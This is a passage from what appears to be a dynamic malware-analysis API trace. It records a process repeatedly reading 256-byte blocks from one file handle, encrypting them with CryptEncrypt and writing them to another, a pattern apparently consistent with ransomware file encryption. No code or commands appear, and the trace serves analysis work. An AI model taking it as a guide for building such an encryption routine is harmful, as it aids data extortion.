hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.639] GetLastError () returned 0x0 [0149.639] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.639] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.639] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.639] GetLastError () returned 0x0 [0149.639] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.639] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.639] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.639] GetLastError () returned 0x0 [0149.639] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.639] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.639] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.639] GetLastError () returned 0x0 [0149.639] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.639] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.639] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.639] GetLastError () returned 0x0 [0149.639] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.639] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.639] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.640] GetLastError () returned 0x0 [0149.640] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.640] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.640] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.640] GetLastError () returned 0x0 [0149.640] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.640] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.640] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.640] GetLastError () returned 0x0 [0149.640] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.640] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.640] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.640] GetLastError () returned 0x0 [0149.640] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.640] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.640] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.640] GetLastError () returned 0x0 [0149.640] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.640] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.640] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.640] GetLastError () returned 0x0 [0149.640] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.640] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.640] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.640] GetLastError () returned 0x0 [0149.640] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.641] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.641] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.641] GetLastError () returned 0x0 [0149.641] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.641] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.641] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.641] GetLastError () returned 0x0 [0149.641] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.641] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.641] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.641] GetLastError () returned 0x0 [0149.641] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.641] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.641] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.641] GetLastError () returned 0x0 [0149.641] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.641] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.641] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.641] GetLastError () returned 0x0 [0149.641] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.641] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.641] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.641] GetLastError () returned 0x0 [0149.641] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.641] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.642] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.642] GetLastError () returned 0x0 [0149.642] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.642] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.642] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.642] GetLastError () returned 0x0 [0149.642] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.642] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.642] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.642] GetLastError () returned 0x0 [0149.642] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.642] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.642] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.642] GetLastError () returned 0x0 [0149.642] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.642] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.642] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.642] GetLastError () returned 0x0 [0149.642] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.642] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.642] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.642] GetLastError () returned 0x0 [0149.642] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.642] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.642] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.642] GetLastError () returned 0x0 [0149.643] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.643] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.643] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.643] GetLastError () returned 0x0 [0149.643] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.643] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.643] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.643] GetLastError () returned 0x0 [0149.643] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.643] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.643] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.643] GetLastError () returned 0x0 [0149.643] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.643] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.643] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.643] GetLastError () returned 0x0 [0149.643] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.643] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.643] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.643] GetLastError () returned 0x0 [0149.643] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.643] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.643] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.643] GetLastError () returned 0x0 [0149.643] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.643] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.644] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.644] GetLastError () returned 0x0 [0149.644] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.644] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.644] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) 